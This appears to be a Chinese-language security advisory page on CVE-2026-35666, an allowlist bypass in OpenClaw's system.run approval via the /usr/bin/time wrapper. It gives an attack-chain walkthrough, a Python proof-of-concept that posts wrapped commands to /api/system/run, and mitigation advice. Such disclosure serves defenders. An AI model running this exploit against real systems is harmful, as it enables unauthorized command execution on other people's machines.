IPBUF安全漏洞报告
English
CVE-2026-35666 CVSS 8.8 高危

CVE-2026-35666 OpenClaw允许列表绕过漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-35666
漏洞类型
权限绕过
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限绕过OpenClawRCECVE-2026-35666Allowlist Bypass

漏洞概述

OpenClaw 2026.3.22之前版本中存在允许列表绕过漏洞。该漏洞源于system.run审批机制未能正确解包/usr/bin/time包装器。攻击者可利用未注册的时间包装器绕过可执行文件绑定限制,重用内部命令的审批状态,从而执行未经授权的操作。

技术细节

该漏洞的核心在于OpenClaw处理`system.run`命令时的逻辑缺陷。当系统验证可执行文件是否在允许列表中时,未对`/usr/bin/time`等包装器进行正确的解包处理。攻击者利用这一缺陷,构造包含未注册time包装器的命令请求。由于校验机制未能识别并剥离包装器,系统错误地将针对包装器的审批状态应用于内部恶意命令,导致原本应被拦截的命令绕过绑定限制并成功执行,造成严重的安全风险。

攻击链分析

STEP 1
1. 侦察
攻击者识别出运行OpenClaw且版本低于2026.3.22的目标系统。
STEP 2
2. 探测
攻击者确认目标启用了`system.run`功能,并存在可执行文件的审批限制。
STEP 3
3. 构造攻击载荷
攻击者构造恶意命令,使用`/usr/bin/time`包装原本被禁止执行的内部命令(如/bin/sh)。
STEP 4
4. 利用漏洞
向OpenClaw接口发送包含time包装器的请求。由于系统未能正确解包wrapper,审批校验被绕过。
STEP 5
5. 执行命令
系统错误地复用了审批状态,执行了内部恶意命令,导致攻击者获得系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # PoC for CVE-2026-35666: OpenClaw Allowlist Bypass import requests import sys def exploit(url, command): """Attempts to execute a command using the time wrapper bypass.""" target_endpoint = f"{url}/api/system/run" # Construct the payload using /usr/bin/time to bypass the allowlist # The vulnerability allows reusing approval state for the inner command payload = { "command": f"/usr/bin/time {command}" } try: response = requests.post(target_endpoint, json=payload, timeout=10) if response.status_code == 200: print(f"[+] Command executed successfully!") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: python {sys.argv[0]} <target_url> <command>") sys.exit(1) target_url = sys.argv[1] cmd = sys.argv[2] exploit(target_url, cmd)

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施
建议立即升级OpenClaw至2026.3.22或更高版本以修复此漏洞。若暂时无法升级,应严格限制对`system.run`功能的网络访问,或在系统层面封禁相关未授权的包装器调用,并监控异常的系统命令执行日志。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表